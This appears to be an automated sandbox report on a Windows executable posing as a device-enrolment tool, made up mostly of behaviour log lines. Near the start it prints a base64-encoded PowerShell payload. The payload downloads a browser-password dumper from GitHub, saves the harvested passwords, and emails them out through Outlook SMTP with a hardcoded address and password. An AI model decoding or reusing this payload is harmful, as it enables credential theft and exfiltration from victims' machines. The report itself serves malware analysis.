Zm9yIEJyb3dzZXIgcGFzc3dvcmRzDQouXFdlYkJyb3dzZXJQYXNzVmlldy5leGUgL3N0ZXh0IEhXSUQudHh0ICNDcmVhdGUgdGhlIGZpbGUgZm9yIEJyb3dzZXIgcGFzc3dvcmRzDQojLlxCcm93c2luZ0hpc3RvcnlWaWV3LmV4ZSAvVmlzaXRUaW1lRmlsdGVyVHlwZSAzIDcgL3N0ZXh0IGhpc3RvcnkudHh0ICNDcmVhdGUgdGhlIGZpbGUgZm9yIEJyb3dzZXIgaGlzdG9yeQ0KIy5cV05ldFdhdGNoZXIuZXhlIC9zdGV4dCBjb25uZWN0ZWRfZGV2aWNlcy50eHQgI0NyZWF0ZSB0aGUgZmlsZSBmb3IgY29ubmVjdGVkIGRldmljZXMNClN0YXJ0LVNsZWVwIC1TZWNvbmRzIDEgI1dhaXQgZm9yIDYwIHNlY29uZHMgKGJlY2F1c2UgY29ubmVjdGVkIGRldmljZXMgZmlsZSB0YWtlIGEgbWludXRlIHRvIGJlIGNyZWF0ZWQpDQojU2V0IG1haWwgb3B0aW9uDQokU01UUFNlcnZlciA9ICdzbXRwLW1haWwub3V0bG9vay5jb20nDQokU01UUEluZm8gPSBOZXctT2JqZWN0IE5ldC5NYWlsLlNtdHBDbGllbnQoJFNtdHBTZXJ2ZXIsIDU4NykNCiRTTVRQSW5mby5FbmFibGVTc2wgPSAkdHJ1ZQ0KJFNNVFBJbmZvLkNyZWRlbnRpYWxzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0Lk5ldHdvcmtDcmVkZW50aWFsKCd1ZG9kZXJieW1haW5Ab3V0bG9vay5jb20nLCAnRGVyYnl1bmkyMDIxJykgI0VtYWlsIHdpdGggd2hpY2ggeW91IHdhbnQgdG8gc2VuZCBpbmZvcm1hdGlvbg0KJFJlcG9ydEVtYWlsID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0Lk1haWwuTWFpbE1lc3NhZ2UNCiRSZXBvcnRFbWFpbC5Gcm9tID0gJ3Vkb2RlcmJ5bWFpbkBvdXRsb29rLmNvbScgI0VtYWlsIGluIHdoaWNoIHlvdSB3YW50IHRvIHJlY2VpY2UgdGhlIGluZm9ybWF0aW9uDQokUmVwb3J0RW1haWwuVG8uQWRkKCd1ZG9kZXJieW1haW5Ab3V0bG9vay5jb20nKSAjRW1haWwgaW4gd2hpY2ggeW91IHdhbnQgdG8gcmVjZWl2ZSB0aGUgaW5mb3JtYXRpb24NCiRSZXBvcnRFbWFpbC5TdWJqZWN0ID0gJ0RhdGEgUmVjZWl2ZWQnDQokUmVwb3J0RW1haWwuQm9keSA9ICdGWUknDQokUmVwb3J0RW1haWwuQXR0YWNobWVudHMuQWRkKCdDOlx0ZW1wXFdpbmRvd3MzMlxIV0lELnR4dCcpDQojJFJlcG9ydEVtYWlsLkF0dGFjaG1lbnRzLkFkZCgnQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1xoaXN0b3J5LnR4dCcpDQojJFJlcG9ydEVtYWlsLkF0dGFjaG1lbnRzLkFkZCgnQzpcVXNlcnN
Source: 0.0.UDO_Device_Enrolment.exe.150000.0.unpack, MainApp.cs	Base64 encoded string: 'TmV3LUl0ZW0gLUl0ZW1UeXBlIERpcmVjdG9yeSAtRm9yY2UgLVBhdGggJ0M6XHRlbXBcV2luZG93czMyJyANClNldC1Mb2NhdGlvbiBDOlx0ZW1wXFdpbmRvd3MzMiAjR28gdG8gdGhlIGZvbGRlciBpbiB3aGljaCB3ZSB3aWxsIGRvbndsb2FkIGZpbGVzDQojQWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uRXh0ZW5zaW9uIGV4ZSAtRm9yY2UgI0FkZCBleGNlcHRpb24gZm9yIC5leGUgZmlsZXMgaW4gYW50aXZpcnVzDQojSW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3R1Y29ubmFpc3lvdWtub3cvQmFkVVNCX3Bhc3NTdGVhbGVyL21haW4vb3RoZXJfZmlsZXMvZmluLnBzMSAtT3V0RmlsZSBmaW4ucHMxICNEb3dubG9hZCBmaW5hbCAucHMxIGZpbGUgdG8gZGVsZXRlIGFsbCAudHh0IGZpbGVzIGFuZCBzdG9wIGFsbCBwb3dlcnNoZWxsIHByb2Nlc3MNCiNJbnZva2UtV2ViUmVxdWVzdCBodHRwczovL2dpdGh1Yi5jb20vdHVjb25uYWlzeW91a25vdy9CYWRVU0JfcGFzc1N0ZWFsZXIvYmxvYi9tYWluL290aGVyX2ZpbGVzL0Jyb3dzaW5nSGlzdG9yeVZpZXcuZXhlP3Jhdz10cnVlIC1PdXRGaWxlIEJyb3dzaW5nSGlzdG9yeVZpZXcuZXhlICNEb3dubG9hZCB0aGUgbmlyc29mdCB0b29sIGZvciBCcm93c2VyaGlzdG9yeQ0KI0ludm9rZS1XZWJSZXF1ZXN0IGh0dHBzOi8vZ2l0aHViLmNvbS90dWNvbm5haXN5b3Vrbm93L0JhZFVTQl9wYXNzU3RlYWxlci9ibG9iL21haW4vb3RoZXJfZmlsZXMvV05ldFdhdGNoZXIuZXhlP3Jhdz10cnVlIC1PdXRGaWxlIFdOZXRXYXRjaGVyLmV4ZSAjRG93bmxvYWQgdGhlIG5pcnNvZnQgdG9vbCBmb3IgY29ubmVjdGVkIGRldmNlcw0KSW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9naXRodWIuY29tL3R1Y29ubmFpc3lvdWtub3cvQmFkVVNCX3Bhc3NTdGVhbGVyL2Jsb2IvbWFpbi9vdGhlcl9maWxlcy9XZWJCcm93c2VyUGFzc1ZpZXcuZXhlP3Jhdz10cnVlIC1PdXRGaWxlIFdlYkJyb3dzZXJQYXNzVmlldy5leGUgI0Rvd25sb2FkIHRoZSBuaXJzb2Z0IHRvb2wgZm9yIEJyb3dzZXIgcGFzc3dvcmRzDQouXFdlYkJyb3dzZXJQYXNzVmlldy5leGUgL3N0ZXh0IEhXSUQudHh0ICNDcmVhdGUgdGhlIGZpbGUgZm9yIEJyb3dzZXIgcGFzc3dvcmRzDQojLlxCcm93c2luZ0hpc3RvcnlWaWV3LmV4ZSAvVmlzaXRUaW1lRmlsdGVyVHlwZSAzIDcgL3N0ZXh0IGhpc3RvcnkudHh0ICNDcmVhdGUgdGhlIGZpbGUgZm9yIEJyb3dzZXIgaGlzdG9yeQ0KIy5cV05ldFdhdGNoZXIuZXhlIC9zdGV4dCBjb25uZWN0ZWRfZGV2aWNlcy50eHQgI0NyZWF0ZSB0aGUgZmlsZSBmb3IgY29ubmVjdGVkIGRldmljZXMNClN0YXJ0LVNsZWVwIC1TZWNvbmRzIDEgI1dhaXQgZm9yIDYwIHNlY29uZHMgKGJlY2F1c2UgY29ubmVjdGVkIGRldmljZXMgZmlsZSB0YWtlIGEgbWludXRlIHRvIGJlIGNyZWF0ZWQpDQojU2V0IG1haWwgb3B0aW9uDQokU01UUFNlcnZlciA9ICdzbXRwLW1haWwub3V0bG9vay5jb20nDQokU01UUEluZm8gPSBOZXctT2JqZWN0IE5ldC5NYWlsLlNtdHBDbGllbnQoJFNtdHBTZXJ2ZXIsIDU4NykNCiRTTVRQSW5mby5FbmFibGVTc2wgPSAkdHJ1ZQ0KJFNNVFBJbmZvLkNyZWRlbnRpYWxzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0Lk5ldHdvcmtDcmVkZW50aWFsKCd1ZG9kZXJieW1haW5Ab3V0bG9vay5jb20nLCAnRGVyYnl1bmkyMDIxJykgI0VtYWlsIHdpdGggd2hpY2ggeW91IHdhbnQgdG8gc2VuZCBpbmZvcm1hdGlvbg0KJFJlcG9ydEVtYWlsID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0Lk1haWwuTWFpbE1lc3NhZ2UNCiRSZXBvcnRFbWFpbC5Gcm9tID0gJ3Vkb2RlcmJ5bWFpbkBvdXRsb29rLmNvbScgI0VtYWlsIGluIHdoaWNoIHlvdSB3YW50IHRvIHJlY2VpY2UgdGhlIGluZm9ybWF0aW9uDQokUmVwb3J0RW1haWwuVG8uQWRkKCd1ZG9kZXJieW1haW5Ab3V0bG9vay5jb20nKSAjRW1haWwgaW4gd2hpY2ggeW91IHdhbnQgdG8gcmVjZWl2ZSB0aGUgaW5mb3JtYXRpb24NCiRSZXBvcnRFbWFpbC5TdWJqZWN0ID0gJ0RhdGEgUmVjZWl2ZWQnDQokUmVwb3J0RW1haWwuQm9keSA9ICdGWUknDQokUmVwb3J0RW1haWwuQXR0YWNobWVudHMuQWRkKCdDOlx0ZW1wXFdpbmRvd3MzMlxIV0lELnR4dCcpDQojJFJlcG9ydEVtYWlsLkF0dGFjaG1lbnRzLkFkZCgnQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1xoaXN0b3J5LnR4dCcpDQojJFJlcG9ydEVtYWlsLkF0dGFjaG1lbnRzLkFkZCgnQzpcVXNlcnN

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_00406F91 GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,

1_2_00406F91

Source: UDO_Device_Enrolment.exe, 00000000.00000003.258777076.000000001D2B3000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.258752372.000000001D2B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ype Corporation which may be registered in certain jurisdictions.slnt
Source: UDO_Device_Enrolment.exe, 00000000.00000003.258711386.000000001D2B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Digitized data copyright The Monotype Corporation 1991-1997. All rights reserved. Twentieth Century"! is a trademark of The Monotype Corporation which may be registered in certain jurisdictions.slnt

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: UDO_Device_Enrolment.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: UDO_Device_Enrolment.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbI source: UDO_Device_Enrolment.exe, 00000000.00000002.336742168.000000001CD26000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: UDO_Device_Enrolment.exe, 00000000.00000002.336155464.000000001AFF6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: UDO_Device_Enrolment.exe, 00000000.00000002.335662738.000000001AF47000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbb source: UDO_Device_Enrolment.exe, 00000000.00000002.336742168.000000001CD26000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: UDO_Device_Enrolment.exe, 00000000.00000002.335580455.000000001AF20000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Code function: 0_2_00007FFBAD2B31ED pushad ; iretd	0_2_00007FFBAD2B31EE
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_00446B75 push ecx; ret	1_2_00446B85
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0044DDB0 push eax; ret	1_2_0044DDC4
Source: C:\temp\Windows32\WebBrowserPassView.exe	Code function: 1_2_0044DDB0 push eax; ret	1_2_0044DDEC

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_004053E1 LoadLibraryW,GetProcAddress,FreeLibrary,#17,MessageBoxW,

1_2_004053E1

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

File created: C:\temp\Windows32\WebBrowserPassView.exe

Jump to dropped file

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\temp\Windows32\WebBrowserPassView.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5452	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -99855s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -99734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -99621s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -99488s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -99360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -99125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -99016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -98860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -98692s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -98563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -98449s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -98327s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -98219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -98097s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -97828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -97714s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -97594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -97470s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -97313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -97173s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -97000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -96878s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -96745s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -96635s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -96499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -96373s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -96265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -96152s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -96044s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe TID: 5220	Thread sleep time: -95937s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

Code function: 0_2_00007FFBAD207F83 str ax

0_2_00007FFBAD207F83

Source: C:\temp\Windows32\WebBrowserPassView.exe

1_2_0040BAE3

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

Window / User API: threadDelayed 9719

Jump to behavior

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_0041A8D8 memset,GetSystemInfo,

1_2_0041A8D8

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_0040B477 FindFirstFileW,FindNextFileW,

1_2_0040B477

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 99855	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 99734	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 99621	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 99488	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 99360	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 99016	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 98860	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 98692	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 98563	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 98449	Jump to behavior
